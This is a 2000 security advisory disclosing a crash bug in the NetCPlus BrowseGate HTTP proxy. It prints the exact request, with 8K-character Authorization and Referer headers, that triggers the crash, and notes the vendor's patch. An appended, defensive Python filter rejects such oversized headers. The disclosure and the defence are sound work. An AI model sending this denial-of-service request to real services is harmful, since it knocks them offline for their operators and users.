Reported September 20, 2000 by Delphis

VERSIONS AFFECTED
  • NetCPlus BrowseGate (Home) V2.80 (H)

DESCRIPTION

It is possible for a remote attacker to cause BrowseGate to crash with invalid memory errors.

DEMONSTRATION

An attacker could telnet to port 80, the listening port of BrowseGate's HTTP proxy, and send the following request:

GET / HTTP/1.0
Authorization:     Basic (A x 8k)
From:     hacker@malicious.ca
If-Modified-Since:     Sat, 29 Oct 1994 19:43:31 GMT
Referer:     http://www.windowsitsecurity.com/ (A x 8K)
UserAgent:     Malicious Browser 1.0

This will cause brwgate.exe to crash with its own error handler. Please note that "(A x 8k)" denotes 8K of characters and "" is a carriage return.
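An added example, not part of the original advisory or the vendor's patch: a Python check that a filter in front of an HTTP proxy could apply to the head of each request, rejecting oversized header fields such as the Authorization and Referer values described above. The limit values and the names check_request_head and _sample are assumptions made for illustration.

```python
# Added example: size limits a front-end filter could enforce before a request
# reaches the proxy. The limits are assumptions, not values from the advisory.
MAX_HEADER_LINE = 4096    # assumed cap on one header line, in bytes
MAX_HEADER_BLOCK = 16384  # assumed cap on request line plus all headers
MAX_HEADER_COUNT = 64     # assumed cap on the number of header fields


def check_request_head(raw: bytes):
    """Return (status, reason) for the head of an HTTP request.

    status is 200 when the head is within limits, otherwise the HTTP
    status a filter would answer with instead of forwarding the request.
    """
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        # No blank line seen: either incomplete or an unterminated header block.
        if len(raw) > MAX_HEADER_BLOCK:
            return 431, "header block exceeds limit without terminator"
        return 400, "incomplete request head"
    if len(head) > MAX_HEADER_BLOCK:
        return 431, "header block exceeds limit"
    lines = head.split(b"\r\n")
    request_line, headers = lines[0], lines[1:]
    if len(request_line) > MAX_HEADER_LINE:
        return 414, "request line too long"
    if len(headers) > MAX_HEADER_COUNT:
        return 431, "too many header fields"
    for line in headers:
        name, colon, _value = line.partition(b":")
        if not colon or not name.strip():
            return 400, "malformed header line"
        if len(line) > MAX_HEADER_LINE:
            return 431, "header too long: " + name.decode("latin-1").strip()
    return 200, "ok"


def _sample(auth_len: int, referer_len: int) -> bytes:
    # Constructed sample input, shaped like the request in the advisory.
    return (b"GET / HTTP/1.0\r\n"
            b"Authorization: Basic " + b"A" * auth_len + b"\r\n"
            b"Referer: http://example.invalid/" + b"A" * referer_len + b"\r\n"
            b"\r\n")
```

The filter answers 431 for a single oversized field and for an oversized header block, so a request of this shape is dropped before the proxy parses it.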

VENDOR RESPONSE

According to Delphis, NetCPlus has promptly fixed this issue and issued a patch available from their website.

CREDIT
Discovered by Delphis